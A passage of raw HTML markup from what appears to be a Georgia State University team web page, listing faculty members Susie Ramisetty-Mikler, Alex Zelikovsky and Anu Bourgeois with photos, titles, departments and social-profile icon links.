</div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 